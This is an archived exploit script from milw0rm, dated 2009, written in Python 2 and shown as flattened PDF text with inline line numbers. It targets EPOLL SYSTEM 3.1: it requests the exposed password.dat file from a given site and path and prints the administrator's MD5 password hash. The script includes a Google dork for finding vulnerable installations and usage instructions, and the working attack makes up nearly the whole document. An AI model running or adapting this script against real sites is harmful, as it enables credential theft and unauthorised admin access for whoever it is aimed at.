EPOLL SYSTEM 3.1 password.dat Disclosure Exploit.pdf

1 #!/usr/bin/python 2 #Portal Name: EPOLL SYSTEM 3 #Version : All version 4 #’Google Dork : Powered by Egorix 5 #Exploit Coded by: Pouya_Server 6 #Exploit Discovered by: Pouya_Server 7 #Contact Me : Pouya.s3rver@Gmail.com 8 #Epoll system login page = www.site.com/[Path]/admin.php 9 import urllib 10 import sys 11 import parser 12 serv="http://" 13 i=0 14 for arg in sys.argv: 15 i=i+1 16 if i!=3: 17 print """\n\n 18 \tEpoll System (password.dat) 19 \tUsage:exploit.py [targetsite] [path] 20 \tExample:exploit.py www.target.com /Path/ 21 \tResult= Admin Pass [MD5]" \n\n""" 22 else: 23 24 adres=sys.argv[1] 25 path=sys.argv[2] 26 str1=adres.join([serv,path]) 27 str2=str1.join([’’,’/password.dat’]) 28 print "\n[~]Connecting..." 29 url=urllib.urlopen(str2).read(); 30 print "\n[+]Connected!" 31 32 test=url.find(path); 33 t=0; 34 print "\n\t\t\t−=[Admin Password]=−" 35 while(url[test+1]!=1): # Pouya 36 print url[test], 37 if(url[test]==’\n’): 38 t=t+1; 39 if(t==2): 40 break; 41 42 test=test+1; 43 print "\n\n\t\t\t[ Coded by Pouya_Server ]" 44 45 # milw0rm.com [2009−01−25] Page 1/1 EPOLL SYSTEM 3.1 password.dat Disclosure Exploit Pouya_Server 01/25/2009